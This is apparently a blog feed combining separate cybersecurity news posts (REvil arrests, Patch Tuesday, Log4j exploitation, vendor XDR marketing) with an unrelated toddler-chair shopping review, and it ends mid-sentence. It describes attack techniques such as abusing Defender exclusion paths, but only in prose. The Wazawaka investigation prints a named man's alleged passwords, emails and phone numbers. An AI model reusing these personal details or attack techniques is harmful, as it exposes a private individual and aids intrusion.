At Request of U.S., Russia Rounds Up 14 REvil Ransomware Affiliates

/0 Comments/in /by

The Russian government said today it arrested 14 people accused of working for “REvil,” a particularly aggressive ransomware group that has extorted hundreds of millions of dollars from victim organizations. The Russian Federal Security Service (FSB) said the actions were taken in response to a request from U.S. officials, but many experts believe the crackdown is part of an effort to reduce tensions over Russian President Vladimir Putin’s decision to station 100,000 troops along the nation’s border with Ukraine.

The FSB headquarters at Lubyanka Square, Moscow. Image: Wikipedia.

The FSB said it arrested 14 REvil ransomware members, and searched more than two dozen addresses in Moscow, St. Petersburg, Leningrad and Lipetsk. As part of the raids, the FSB seized more than $600,000 US dollars, 426 million rubles (~$USD 5.5 million), 500,000 euros, and 20 “premium cars” purchased with funds obtained from cybercrime.

“The search activities were based on the appeal of the US authorities, who reported on the leader of the criminal community and his involvement in encroaching on the information resources of foreign high-tech companies by introducing malicious software, encrypting information and extorting money for its decryption,” the FSB said. “Representatives of the US competent authorities have been informed about the results of the operation.”

The FSB did not release the names of any of the individuals arrested, although a report from the Russian news agency TASS mentions two defendants: Roman Gennadyevich Muromsky, and Andrey Sergeevich Bessonov. Russian media outlet RIA Novosti released video footage from some of the raids:

REvil is widely thought to be a reincarnation of GandCrab, a Russian-language ransomware affiliate program that bragged of stealing more than $2 billion when it closed up shop in the summer of 2019. For roughly the next two years, REvil’s “Happy Blog” would churn out press releases naming and shaming dozens of new victims each week. A February 2021 analysis from researchers at IBM found the REvil gang earned more than $120 million in 2020 alone.

But all that changed last summer, when REvil associates working with another ransomware group — DarkSide — attacked Colonial Pipeline, causing fuel shortages and price spikes across the United States. Just months later, a multi-country law enforcement operation allowed investigators to hack into the REvil gang’s operations and force the group offline.

In November 2021, Europol announced it arrested seven REvil affliates who collectively made more than $230 million worth of ransom demands since 2019. At the same time, U.S. authorities unsealed two indictments against a pair of accused REvil cybercriminals, which referred to the men as “REvil Affiliate #22” and “REvil Affiliate #23.”

It is clear that U.S. authorities have known for some time the real names of REvil’s top captains and moneymakers. Last fall, President Biden told Putin that he expects Russia to act when the United States shares information on specific Russians involved in ransomware activity.

So why now? Russia has amassed approximately 100,000 troops along its southern border with Ukraine, and diplomatic efforts to defuse the situation have reportedly broken down. The Washington Post and other media outlets today report that the Biden administration has accused Moscow of sending saboteurs into Eastern Ukraine to stage an incident that could give Putin a pretext for ordering an invasion.

“The most interesting thing about these arrests is the timing,” said Kevin Breen, director of threat research at Immersive Labs. “For years, Russian Government policy on cybercriminals has been less than proactive to say the least. With Russia and the US currently at the diplomatic table, these arrests are likely part of a far wider, multi-layered, political negotiation.”

President Biden has warned that Russia can expect severe sanctions should it choose to invade Ukraine. But Putin in turn has said such sanctions could cause a complete break in diplomatic relations between the two countries.

Dmitri Alperovitch, co-founder of and former chief technology officer for the security firm CrowdStrike, called the REvil arrests in Russia “ransomware diplomacy.”

“This is Russian ransomware diplomacy,” Alperovitch said on Twitter. “It is a signal to the United States — if you don’t enact severe sanctions against us for invasion of Ukraine, we will continue to cooperate with you on ransomware investigations.”

The REvil arrests were announced as many government websites in Ukraine were defaced by hackers with an ominous message warning Ukrainians that their personal data was being uploaded to the Internet. “Be afraid and expect the worst,” the message warned.

Experts say there is good reason for Ukraine to be afraid. Ukraine has long been used as the testing grounds for Russian offensive hacking capabilities. State-backed Russian hackers have been blamed for the Dec. 23, 2015 cyberattack on Ukraine’s power grid that left 230,000 customers shivering in the dark.

The warning left behind on Ukrainian government websites that were defaced in the last 24 hours. The same statement is written in Ukrainian, Russian and Polish.

Russia also has been suspected of releasing NotPetya, a large-scale cyberattack initially aimed at Ukrainian businesses that ended up creating an extremely disruptive and expensive global malware outbreak.

Although there has been no clear attribution of these latest attacks to Russia, there is reason to suspect Russia’s hand, said David Salvo, deputy director of The Alliance for Securing Democracy.

“These are tried and true Russian tactics. Russia used cyber operations and information operations in the run-up to its invasion of Georgia in 2008. It has long waged massive cyberattacks against Ukrainian infrastructure, as well as information operations targeting Ukrainian soldiers and Ukrainian citizens. And it is completely unsurprising that it would use these tactics now when it is clear Moscow is looking for any pretext to invade Ukraine again and cast blame on the West in its typical cynical fashion.”

The Good, the Bad and the Ugly in Cybersecurity – Week 2

/0 Comments/in /by

The Good

Cyber cops in the Ukraine assisted by US and UK law enforcement officers have this week bust a ransomware gang that is believed to have caused losses of around $1 million to more than 50 American and European businesses.

According to the Cyberpolice of Ukraine, a husband-and-wife team from Kyiv aided by three accomplices used malspam to breach companies and infect them with ransomware. The gang also offered IP anonymization services to other cyber criminals and stole banking credentials from UK consumers. These were subsequently used to purchase goods from online stores, which were later resold for cash.

The gang no doubt believed they were on to a good thing until the cops raided their homes and confiscated three cars along with multiple computers, phones, bank cards and flash drives. The five individuals will be charged with offenses related to computer misuse, the use, distribution or sale of malicious software or hardware, and money laundering. As the gang had contacts with other international cyber criminals, there is the potential for further arrests down the road, and police say the investigation is ongoing.

The Bad

While it’s great to see the police take down one ransomware gang, plenty of others are still running amok. This week has seen a number of other successful attacks impacting businesses.

Among those affected are Netherlands’ Game Mania, which was hit in the early hours of Monday morning with a ransomware attack and data breach. Attackers gained access to a server containing company data, including customer PII, as well as deploying an unnamed ransomware. While the company says its business activities remain unaffected, they are warning customers to be vigilant of phishing scams and unsolicited emails demanding money.

Wednesday saw another attack on US critical infrastructure. Last week it was an Albuquerque jail, this week it’s the education sector. Albuquerque Public Schools were forced to cancel classes in around 31 schools after teachers discovered the attack prevented them from accessing the APS student information system, which is used to record attendance, grades and other student information.

In a stark reminder of the true costs of ransomware, this week also saw Houston-based United Structures of America, Inc, which fabricates and designs steel structures for use in buildings and other applications, file for bankruptcy as a consequence of a ransomware attack back in 2019. The attackers erased the company’s financial records and technical software and demanded a ransom for return of the data. Although the company paid the ransom, the attackers did not fulfill their end of the bargain and the data was never returned. As a result, the company, which at one time had brought in revenue in excess of $100 million, was forced to start winding down its operations.

The Ugly

Software development and bugs go hand-in-hand, which is why many vendors offer bug bounty programs so that external researchers can help spot problems the developers may not have foreseen. And while despite that there are still some really bad bugs out there that remain unpatched, things really start to turn ugly when it turns out that a piece of security software has had a known but unpatched bypass for eight years.

The bug? It turns out Microsoft Defender allows unprivileged users to look-up any locally excluded paths. Even if an admin hasn’t created any exclusions, certain software installations and server configurations can result in some paths being automatically excluded. If an attacker has local access, they can look up these excluded paths and drop their malware at paths that Defender will ignore. Researchers this week tested the theory with a sample of Conti ransomware, encrypting the device while Defender sat idly by.

For enterprises relying on Defender to protect their servers and other endpoints, this is a gaping security hole. While an attacker does need a foothold, they don’t need privileges, and with plenty of other RCEs available at the moment, it really is past time that enterprises started looking beyond OS vendors for effective defense of their endpoints and networks.

Toddler wooden chair – cute and worth your trust!

/0 Comments/in /by

There is nothing better than a classic, trusty wooden chair when you need a place for your child to sit. Made of natural materials and can take the significant weight, easy to clean with a damp cloth – you can’t go wrong with this.

As a parent, the biggest problem that you may come across is to find a reliable toddler wooden chair. It is much likely that you will find various ones in the market, but it may be confusing to choose which one would suit your kid’s needs.

You don’t need to worry, as we have compiled all the necessary information about toddler wooden chairs and their pros and cons here. First, let us start with what to consider when buying a wooden chair for your toddler.

Things To Consider Before Buying A Wooden Toddler Chair

You may find many stylish and durable toddler wooden chairs, but it’s crucial to keep certain things in your mind before buying one.

• Your kid’s comfort. Make sure that the seat is deep enough to accommodate your toddler. The bottom of the chair must be sturdy to bear heavy pressure on it.

• Durability. The wooden toddler chair should be sturdy and long-lasting so that your child can use it for many years without any problem. A strong base is advisable because the child’s weight will be on the chair, so avoid chairs made up of plastic or metal as they are not durable. The wooden one is best as it can be used for many years.

• Material. Wooden toddler chairs are much durable and comfortable, so that’s the reason most of the parents prefer buying a wooden one rather than other types. There are various kinds of woods available in the market but go for ones with veneer as it is more durable and long-lasting.

• Price. You may find many wooden toddler chairs within your budget, so do not worry about the price.

These are some tips that you need to consider before buying a wooden toddler chair for your child. It not only allows cherishing with your kid but also develops various skills in them like creativity and independence.

Best wooden chairs for your toddler

Do you want to buy a wooden toddler chair for your child? Here are some of the best ones available in the market.

Famobay Bunny Ears Wooden Toddler Chair

Just look how cute is this toddler chair! The backrest shaped like bunny ears is an adorable feature for little ones. It is made of solid and smooth wooden construction, making it long-lasting and sturdy.

Based on its innovative design, you would think that this toddler chair would be much more expensive than any other option on the market. However, it is not the case here!

This bunny ears toddler chair is available on Amazon at a very reasonable price. It is solid, durable, and easy to keep clean, making it the best choice for your household.

Famobay Antlers Wooden Toddler Chair

If you like Bunny Ears Toddler Wooden Chair, you will be happy to learn that another similar toddler chair is available. This time its design is based on antlers to make your little one feel like a wild animal.

Like the previous product, this antlers toddler chair is made of natural smooth wood, making it very durable. It can carry heavyweight up to 400 lbs, which you can’t say about other products on the market. There is no doubt that your child can use this chair for many years.

Melissa & Doug Wooden Chairs, Set of 2

Melissa & Doug’s kids’ furniture is the way to go for those wanting a simple and classic design for kids’ room. The playroom chairs set was created with safety in mind – something Melissa & Doug is well-known for. The chairs feature a reinforced, tip-resistant design.

They are made from durable wood, with materials that hold up to 100 pounds. The Melissa & Doug Solid Wood Chairs set makes an excellent gift for kids from 3 to 8 years old.

Toddler Chair CXRYLZ

If you like a simple design but still wish to bring your toddler a little bit of color, take a look at this chair. This little chair is made of wood and will surely look lovely in any kids’ room. It also has round edges, which are much safer for your toddler than sharp ones.

This chair is so cute, you might not want to give it away when your kid grows up! Beautiful colors are not the only thing that makes this chair so unique. It is also made of quality materials which make it durable and long-lasting.

Its compact size will help you fit it almost anywhere in your house, even if you have limited space for kids’ furniture: 25cm/10in legs, 30 x 30cm/12” x 12” seat surface, and 26.5 x 20cm/10.5” x 7.9” backrest. This cutie can hold up to 250 lbs.

HOUCHICS Wooden Toddler Chair

Unique toddler wooden chair! This piece has a curved back to better protect your child from being injured by the prismatic edge of the wooden stool. It is not only for safety reasons but also to give your child a more comfortable sitting position.

This toddler chair has an additional feature of non-slip pads that will help prevent the stool from sliding on the floor surface. You can also adjust its height depending on what you need at the moment.

The HOUCHICS Wooden Toddler Chair is very easy to clean – you can use a damp cloth and soap. A wide handle at the back provides a comfortable grip to lift the toddler chair off the floor.

It’s suitable for children from 3 years of age up to 6-7 years. Be sure that your child will be comfortable sitting on this stool!

iPlay iLearn 10 Inch Kids Solid Hard Wood Animal Chair

Cute animal chairs with vivid, engaging characters are appealing and attractive to children aged 2 and up. Not only will your child be excited to sit on the iPlay iLearn animal chairs, but they will be learning at the same time.

Each chair has a sturdy 10-inch solid wood base designed to prevent tipping when your child leans against it. The triangular structure of the chair legs helps prevent tipping, and anti-slip pads on each leg prevent falls.

The iPlay iLearn chairs can be stacked for easy storage, and they are made of 100% natural smooth hardwood. They are hand-painted with non-toxic paints to ensure complete safety.

This is the perfect gift for toddlers aged 2-4! Parents love it because it is sturdy, safe, and easy to clean; kids love them because of the vibrant colors and animal characters. Among the patterns, you’ll find a giraffe visible above, a frog, and a cow.

Why is it necessary to buy a wooden toddler chair?

As we all know, kids look forward to spending time with their parents and if you can encourage them to spend more time on furniture, then do it as soon as possible. As a parent, you must have noticed that your child prefers being beside you rather than playing alone. It’s a sign that your child wants to spend more time with you, which is absolutely normal.

The best way to encourage them is to buy them a wooden toddler chair because it would allow your child to sit beside you and enjoy being together while reading books or watching exhibits on display cabinets. This can be good practice for your child to be more responsible and understand the concept of time, as it also encourages them to play independently.

Children prefer wooden chairs because they are much comfortable than other types. They like splashing colors in their surrounding, so if you buy a wooden toddler chair in vibrant color, your child will love it. A wooden toddler chair is the best way to encourage your child and develop their creative side.

Apart from all these benefits, toddlers learn many things by watching us, so if you want them to become responsible and obedient in the future, teach them how to sit correctly on a wooden toddler chair. They will get an idea about sitting straight, and it would be beneficial for them in the future.

The post Toddler wooden chair – cute and worth your trust! appeared first on Comfy Bummy.

Rapid Response with XDR One-Click Remediations

/0 Comments/in /by

Responding to a cyber threat takes time as defenders want to do more than merely stop malicious threats; they also need to ensure any compromised identities or accounts are restored, that any lingering phishing emails sitting in inboxes ready to re-detonate and restart the attack are cleaned up, that if vulnerable software was involved it’s patched or removed from endpoints, and the list goes on.

For years now, the only way to do this efficiently was via a SOAR, and that required high costs and usually additional headcount to build and maintain the playbooks. All this led to a very ‘human-centric’ manual response process, which added up to a longer containment and response time.

XDR was made to solve problems like these. Singularity XDR unifies and extends detection, investigation and response capability across the entire enterprise, providing security teams with centralized end-to-end enterprise visibility, powerful analytics, and automatable response across the technology stack – making every security workflow faster, more effective and more accurate.

Recently, we introduced XDR apps for response that take this approach to the next level with one-click remediations. Let’s find out more.

XDR Response Actions for One-Click Remediation

Our recent launch of additional XDR apps for response is an XDR milestone that will continue to strengthen Singularity XDR. With XDR Response actions, a user can drop an API Key into our Marketplace, choose the automatic actions and conditions they desire, and SentinelOne will do the rest.

This kind of response can take an action in seconds that would have otherwise taken minutes or required opening a ticket and waiting.

Take the act of resetting a user’s password and expiring their sessions. Most SOC analysts don’t have access to the proper Identity Provider portals (IdPs) to do this as the identity team doesn’t want to add the entire SOC to the portal. At best, it would have required the identity team creating very specific RBAC roles in AD, Okta, etc to have security roles. Without access, the analyst must open a ticket and wait. With XDR, there’s a button for that. Where is it? Right in the threat.

XDR Response actions are the single click that can stop expansion. If an analyst finds a threat where an internal user’s credentials have been used to log into email and send phishing links, XDR can suspend the user’s email access or just block the hash from being passed around. Until the credentials can be trusted again, that analyst can also move the user to a more restrictive SASE policy to ensure data like financial results and intellectual property stored in cloud apps are protected.

How Does It Work?

The identity team provides the SentinelOne admin an API key which is then input into the Marketplace. The key can be broadly permissive or purpose fit to ensure least privilege just for the SentinelOne XDR use cases.

Next, the user selects which integrations to turn on and which to leave disabled. They then select if the action should happen on all threats or just those SentinelOne has higher confidence on as being malicious. The user is now done with configuration.

The app they selected is pre-programmed with all the logic needed. The next time a matching threat pops up, SentinelOne will automatically take the chosen action.

For admins that want to allow analysts to evaluate threats before taking actions, manual actions can be enabled in the same Marketplace flow. Manual actions allow admins to browse a list of all enabled XDR actions to remediate a threat across the stack, whether it be banning a hash, a user, or an IP address.

This keeps the analyst in the loop before actions are taken while still helping accelerate remediation to minutes instead of hours or even days when there are dependencies on another team.

XDR Offers Greater Flexibility Than a SOAR

While a SOAR can be a tremendous tool for those who have the budget and staff, XDR is the turnkey tool that allows more teams to adopt orchestration. SOAR playbooks can run highly customized flows but maintaining them as processes and tools change has proved a barrier or unsustainable for many.

Enabling a list of automatic actions or manually selecting them from a threat triage model is the flexible approach that enables every team of every size to be more efficient and effective.

What Triggered This Innovation, Why Now?

This technological leap is arriving now because of the need to streamline security workflows, consolidate various tools in the SOC while rapidly responding to remediate threats across the enterprise. While partnerships and Marketplaces have been done before, they’ve never been done with this level of deeper, frictionless integration.

XDR requires vendors to work together to build integrations that go deeper and broader. We’ve found the market is ready to partner and that’s why we’ve taken a “native and open” approach to XDR, offering many solutions on our platform while partnering with best-in-class vendors from across the stack.

XDR is the result of a better understanding of how teams work and what fits budgets. Security is trending in the direction of tools that give teams flexibility without requiring them to build and maintain complex logic or code.

The market has been waiting for simple security that saves teams time and money without a large upfront investment. Technology, partnership, and knowledge have all converged to bring security into the next generation.

Conclusion

With XDR apps for response and one-click remediations, Singularity XDR and Singularity Marketplace continue to expand, offering deeper, more effective integrations that simplify the remediation cycle.

Automated actions are available today and will become more nuanced in how and when they are automatically invoked as our partners create new APIs for us to integrate with, to go deeper into their products, and unlock the full value of every layer in the stack to mitigate and remediate threats.

Interested in learning more? Read about our open approach to XDR that allows for connecting best-in-class products. Want to see how XDR works for your organization? Contact us or request a free Singularity XDR demo.

SentinelOne Singularity XDR
Supercharge. Fortify. Automate. Extend protection with unfettered visibility, proven protection, and unparalleled response.

Learn More

‘Wormable’ Flaw Leads January 2022 Patch Tuesday

/0 Comments/in /by

Microsoft today released updates to plug nearly 120 security holes in Windows and supported software. Six of the vulnerabilities were publicly detailed already, potentially giving attackers a head start in figuring out how to exploit them in unpatched systems. More concerning, Microsoft warns that one of the flaws fixed this month is “wormable,” meaning no human interaction would be required for an attack to spread from one vulnerable Windows box to another.

Nine of the vulnerabilities fixed in this month’s Patch Tuesday received Microsoft’s “critical” rating, meaning malware or miscreants can exploit them to gain remote access to vulnerable Windows systems through no help from the user.

By all accounts, the most severe flaw addressed today is CVE-2022-21907, a critical, remote code execution flaw in the “HTTP Protocol Stack.” Microsoft says the flaw affects Windows 10 and Windows 11, as well as Server 2019 and Server 2022.

“While this is definitely more server-centric, remember that Windows clients can also run http.sys, so all affected versions are affected by this bug,” said Dustin Childs from Trend Micro’s Zero Day Initiative. “Test and deploy this patch quickly.”

Quickly indeed. In May 2021, Microsoft patched a similarly critical and wormable vulnerability in the HTTP Protocol Stack; less than a week later, computer code made to exploit the flaw was posted online.

Microsoft also fixed three more remote code execution flaws in Exchange Server, a technology that hundreds of thousands of organizations worldwide use to manage their email. Exchange flaws are a major target of malicious hackers. Almost a year ago, hundreds of thousands of Exchange servers worldwide were compromised by malware after attackers started mass-exploiting four zero-day flaws in Exchange.

Microsoft says the limiting factor with these three newly found Exchange flaws is that an attacker would need to be tied to the target’s network somehow to exploit them. But Satnam Narang at Tenable notes Microsoft has labeled all three Exchange flaws as “exploitation more likely.”

“One of the flaws, CVE-2022-21846, was disclosed to Microsoft by the National Security Agency,” Narang said. “Despite the rating, Microsoft notes the attack vector is adjacent, meaning exploitation will require more legwork for an attacker, unlike the ProxyLogon and ProxyShell vulnerabilities which were remotely exploitable.”

Security firm Rapid7 points out that roughly a quarter of the security updates this month address vulnerabilities in Microsoft’s Edge browser via Chromium.

“None of these have yet been seen exploited in the wild, though six were publicly disclosed prior to today,” Rapid7’s Greg Wiseman said. “This includes two Remote Code Execution vulnerabilities affecting open source libraries that are bundled with more recent versions of Windows: CVE-2021-22947, which affects the curl library, and CVE-2021-36976 which affects libarchive.”

Wiseman said slightly less scary than the HTTP Protocol Stack vulnerability is CVE-2022-21840, which affects all supported versions of Office, as well as Sharepoint Server.

“Exploitation would require social engineering to entice a victim to open an attachment or visit a malicious website,” he said. “Thankfully the Windows preview pane is not a vector for this attack.”

Other patches include fixes for .NET Framework, Microsoft Dynamics, Windows Hyper-V, Windows Defender, and the Windows Remote Desktop Protocol (RDP). As usual, the SANS Internet Storm Center has a per-patch breakdown by severity and impact.

Standard disclaimer: Before you update Windows, please make sure you have backed up your system and/or important files. It’s not uncommon for a Windows update package to hose one’s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.

So do yourself a favor and backup before installing any patches. Windows 10 even has some built-in tools to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.

And if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see this guide.

If you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a decent chance other readers have experienced the same and may chime in here with useful tips.

Update, Jan. 12, 9:02 a.m.: Apparently some of the updates Microsoft released yesterday — KB5009557 (2019) and KB5009555 (2022) — are causing something to fail on domain controllers, which then keep rebooting every few minutes. That’s according to this growing thread on Reddit (hat tip to @campuscodi).

Who is the Network Access Broker ‘Wazawaka?’

/0 Comments/in /by

In a great many ransomware attacks, the criminals who pillage the victim’s network are not the same crooks who gained the initial access to the victim organization. More commonly, the infected PC or stolen VPN credentials the gang used to break in were purchased from a cybercriminal middleman known as an initial access broker. This post examines some of the clues left behind by “Wazawaka,” the hacker handle chosen by a major access broker in the Russian-speaking cybercrime scene.

Wazawaka has been a highly active member of multiple cybercrime forums over the past decade, but his favorite is the Russian-language community Exploit. Wazawaka spent his early days on Exploit and other forums selling distributed denial-of-service (DDoS) attacks that could knock websites offline for about USD $80 a day. But in more recent years, Wazawaka has focused on peddling access to organizations and to databases stolen from hacked companies.

“Come, rob, and get dough!,” reads a thread started by Wazawaka on Exploit in March 2020, in which he sold access to a Chinese company with more than $10 billion in annual revenues. “Show them who is boss.”

According to their posts on Exploit, Wazawaka has worked with at least two different ransomware affiliate programs, including LockBit. Wazawaka said LockBit had paid him roughly $500,000 in commissions for the six months leading up to September 2020.

Wazawaka also said he’d teamed up with DarkSide, the ransomware affiliate group responsible for the six-day outage at Colonial Pipeline last year that caused nationwide fuel shortages and price spikes. The U.S. Department of State has since offered a $5 million reward for information leading to the arrest and conviction of any DarkSide affiliates.

Wazawaka seems to have adopted the uniquely communitarian view that when organizations being held for ransom decline to cooperate or pay up, any data stolen from the victim should be published on the Russian cybercrime forums for all to plunder — not privately sold to the highest bidder. In thread after thread on the crime forum XSS, Wazawaka’s alias “Uhodiransomwar” can be seen posting download links to databases from companies that have refused to negotiate after five days.

“The only and the main principle of ransomware is: the information that you steal should never be sold,” Uhodiransomwar wrote in August 2020. “The community needs to receive it absolutely free of charge if the ransom isn’t paid by the side that this information is stolen from.”

Wazawaka hasn’t always been so friendly to other cybercrooks. Over the past ten years, his contact information has been used to register numerous phishing domains intended to siphon credentials from people trying to transact on various dark web marketplaces. In 2018, Wazawaka registered a slew of domains spoofing the real domain for the Hydra dark web market. In 2014, Wazawaka confided to another crime forum member via private message that he made good money stealing accounts from drug dealers on these marketplaces.

“I used to steal their QIWI accounts with up to $500k in them,” Wazawaka recalled. “A dealer would never go to the cops and tell them he was selling stuff online and someone stole his money.”

WHO IS WAZAWAKA?

Wazawaka used multiple email addresses and nicknames on several Russian crime forums, but data collected by cybersecurity firm Constella Intelligence show that Wazawaka’s alter egos always used one of three fairly unique passwords: 2k3x8x57, 2k3X8X57, and 00virtual.

Those three passwords were used by one or all of Wazawaka’s email addresses on the crime forums over the years, including wazawaka@yandex.ru, mixseo@mail.ru, mixseo@yandex.ru, mixfb@yandex.ru.

That last email address was used almost a decade ago to register a Vkontakte (Russian version of Facebook) account under the name Mikhail “Mix” Matveev. The phone number tied to that Vkontakte account — 7617467845 — was assigned by the Russian telephony provider MegaFon to a resident in Khakassia, situated in the southwestern part of Eastern Siberia.

DomainTools.com [an advertiser on this site] reports mixfb@yandex.ru was used to register three domains between 2008 and 2010: ddosis.ru, best-stalker.com, and cs-arena.org. That last domain was originally registered in 2009 to a Mikhail P. Matveyev, in Abakan, Khakassia.

Mikhail Matveev is not the most unusual name in Russia, but other clues help narrow things down quite a bit. For example, early in his postings to Exploit, Wazawaka can be seen telling members that he can be contacted via the ICQ instant message account 902228.

An Internet search for Wazawaka’s ICQ number brings up a 2009 account for a Wazawaka on a now defunct discussion forum about Kopyovo-a, a town of roughly 4,400 souls in the Russian republic of Khakassia:

MIKHAIL’S MIX

Also around 2009, someone using the nickname Wazawaka and the 902228 ICQ address started posting to Russian social media networks trying to convince locals to frequent the website “fureha.ru,” which was billed as another website catering to residents of Khakassia.

According to the Russian domain watcher 1stat.ru, fureha.ru was registered in January 2009 to the email address mix@devilart.net and the phone number +79617467845, which is the same number tied to the Mikhail “Mix” Matveev Vkontakte account.

DomainTools.com says the mix@devilart.net address was used to register two domains: one called badamania[.]ru, and a defunct porn site called tvporka[.]ru. The phone number tied to that porn site registration back in 2010 was 79235810401, also issued by MegaFon in Khakassia.

A search in Skype for that number shows that it was associated more than a decade ago with the username “matveevatanya1.” It was registered to a now 29-year-old Tatayana Matveeva Deryabina, whose Vkontakte profile says she currently resides in Krasnoyarsk, the largest city that is closest to Abakan and Abaza.

It seems likely that Tatayana is a relative of Mikhail Matveev, perhaps even his sister. Neither responded to requests for comment. In 2009, a Mikhail Matveev from Abaza, Khakassia registered the username Wazawaka on weblancer.net, a freelance job exchange for Russian IT professionals. The Weblancer account says Wazawaka is currently 33 years old.

In March 2019, Wazawaka explained a lengthy absence on Exploit by saying he’d fathered a child. “I will answer everyone in a week or two,” the crime actor wrote. “Became a dad — went on vacation for a couple of weeks.”

One of the many email addresses Wazawaka used was devdelphi@yandex.ru, which is tied to a more recent but since-deleted Vkontakte account for a Mikhail Matveev and used the password 2k3X8X57. As per usual, I put together a mind map showing the connections referenced in this story:

A rough mind map of the connections mentioned in this story.

Analysts with cyber intelligence firm Flashpoint say Wazawaka’s postings on various Russian crime forums show he is proficient in many specializations, including botnet operations, keylogger malware, spam botnets, credential harvesting, Google Analytics manipulation, selling databases for spam operations, and launching DDoS attacks.

Flashpoint says it is likely Wazawaka/Mix/M1x has shared cybercriminal identities and accounts with multiple other forum members, most of whom appear to have been partners in his DDoS-for-hire business a decade ago. For example, Flashpoint points to an Antichat forum thread from 2009 where members said M1x worked on his DDoS service with a hacker by the nickname “Vedd,” who was reputedly also a resident of Abakan.

STAY  TRUE, & MOTHER RUSSIA WILL HELP YOU

All of this is academic, of course, provided Mr. Wazawaka chooses to a) never leave Russia and b) avoid cybercrime activities that target Russian citizens. In a January 2021 thread on Exploit regarding the arrest of an affiliate for the NetWalker ransomware program and its subsequent demise, Wazawaka seems already resigned those limitations.

“Don’t shit where you live, travel local, and don’t go abroad,” Wazawaka said of his own personal mantra.

Which might explain why Wazawaka is so lackadaisical about hiding and protecting his cybercriminal identities: Incredibly, Wazawaka’s alter ego on the forum XSS — Uhodiransomware — still uses the same password on the forum that he used for his Vkontakte account 10 years ago. Lucky for him, XSS also demands a one-time code from his mobile authentication app.

The second step of logging into Wazawaka’s account on XSS (Uhodiransomwar).

Wazawaka said NetWalker’s closure was the result of its administrator (a.k.a. “Bugatti”) getting greedy, and then he proceeds to preach about the need to periodically re-brand one’s cybercriminal identity.

“I’ve had some business with Bugatti,” Wazawaka said. “The guy got too rich and began recruiting Americans as affiliate partners. What happened now is the result. That’s okay, though. I wish Bugatti to do some rebranding and start from the beginning 🙂 As for the servers that were seized, they should’ve hosted their admin panels in Russia to avoid getting their servers seized by INTERPOL, the FBI, or whatever.”

“Mother Russia will help you,” Wazawaka concluded. “Love your country, and you will always get away with everything.”

If you liked this post, you may also enjoy Who Is the Network Access Broker “Babam”?

Log4j One Month On | Crimeware and Exploitation Roundup

/0 Comments/in /by

It has been 31 days since the initial public disclosure of a remote code execution (RCE) critical vulnerability in the Apache Log4j logging library that upended enterprise security at the close of 2021. In that time, since the initial CVE-2021-44228 (critical), we’ve already seen five more related CVEs

  • CVE-2021-45046 (critical)
  • CVE-2021-4104 (high)
  • CVE-2021-42550 (moderate)
  • CVE-2021-45105 (moderate)
  • CVE-2021-44832 (moderate))

and several updates to the library from 2.15.01 on December 9th to 2.17.1 on December 28th.

The importance of this class of vulnerabilities in such a ubiquitous library must not be forgotten with the next spin of the cyber news cycle: with millions of vulnerable devices, attacks are likely to continue for as long as such devices running unpatched software can be found by threat actors.

In this post, we round up all the activity to date concerning Log4Shell exploits to underscore the importance of timely discovery and patching of affected systems.

Log4j Initial Impact | Criminals and Researchers Equally Alert

As described in more detail here, there are two novel characteristics of a Log4j attack:

  1. The attacking string can be injected into any user input that will be logged such as an http header, a username, or a file name.
  2. The server the attacker communicates with and the server being attacked can be completely different and even located within different networks. In this case, internal logging servers located within trusted networks can suddenly communicate with attackers on the internet.

These characteristics provide a simple and potent tool and it took less than 24 hours after public disclosure of CVE-2021-44228 for attackers to generate over 60 permutations of the attack string.

Within hours of the public disclosure, we saw discussion and adoption of the issue within well-known underground Russian crime forums.

RU forum discussions

Researchers in the Chinese hacking community also claimed to have seen evidence of fast-automated exploitation tools Log4j_RCE_Tool, ReverseShell PoCs and an increasing number of articles on exploiting additional JNDI vulnerabilities in IBM WebLogic servers.

Meanwhile, researchers found that their Log4j honeypots were lighting up with alarming speed within 24 hours of the initial disclosure.

December 2021 | Log4Shell Attacks In the Wild

The first wave of attacks using the Log4Shell exploit were relatively unsophisticated actors dropping various cryptominers on victims. Perhaps most audacious of these was a reported 8-day long hack of HP AMD-based 9000 EYPC servers that was used to mine around 3.4 million Raptoreum coins, with an approximate value of $110,000. It is thought that the attackers were able to cash-out about half of the coins they mined before the operation was shut down.

Miner attacks were quickly followed with the appearance of a number of new ransomware families taking advantage of Log4j as a means of initial access, such as Khonsari ransomware. Attackers exploited Log4j to download and launch a malicious Java class file, which then retrieved the Khonsari ransomware payload from a C2.

Additional ransomware families soon followed, including TellYouThePass. This family had been relatively dormant prior to the Log4j vulnerability disclosure. TellYouThePass has both Windows and Linux variants, allowing it to attack the majority of servers likely to be vulnerable to Log4j exploitation.

Conti Attacks Log4j-Vulnerable Devices Not Exposed to the Public Internet

Within days of the flaw being disclosed, Conti ransomware campaigns were reportedly observed taking advantage of the vulnerability, with multiple campaigns focused on high-value vCenter environments. This development is noteworthy as the target machines were not necessarily exposed to the public internet. Rather, where the Conti operators had already gained an initial foothold into a target’s network, they exploited Log4j to compromise and encrypt vulnerable vCenter servers within the network.

Naturally, the Emotet crew has been taking advantage of Log4j as well. For example, vulnerable servers were quickly compromised and used for staging and payload hosting within the greater Emotet network. While we fully expect Emotet to embrace Log4j for direct delivery, we have yet to observe this development. However, we do currently see the use of Log4j to deliver Cobalt Strike Beacons, which can then be followed by any number of payloads.

In mid-December, Vietnamese crypto-exchange ONUS was attacked via exploitation of Log4j. The attack likely occurred within two to three days of the initial Log4j disclosure. The company patched their vulnerable servers sometime after the 13th of December, by which time the company had already been breached. The attackers later attempted to extort the company out of $5 million. For that amount, the attackers offered not to leak a cache of stolen data including PII. After the Fintech firm refused to pay, the attackers attempted to sell this data on a well-known hacking forum on December 25th:

Hackers try to sell data from log4j compromise

Ransomware operators and extortionists are not the only ones getting in on the action. The actors behind Dridex have also expediently adopted the use of this exploit for their own nefarious purposes. In mid to late December, we saw mass distribution of Dridex by way of Log4j. In most cases, the exploit was used to load a malicious Java class, followed by a .HTA file containing a VBScript. From there we see more of a standard DLL-based flow.

January 2022 | Regulators and CISA Add Pressure to Remediate Log4j

On January 4th, the pressure for enterprises to ensure they have taken appropriate steps to remediate assets running vulnerable Log4j libraries was ramped up even further by the FTC.

Noting that Log4j “poses a severe risk to millions of consumer products” and that the vulnerability is being widely exploited by a growing set of threat actors, the FTC said on January 4 that it will

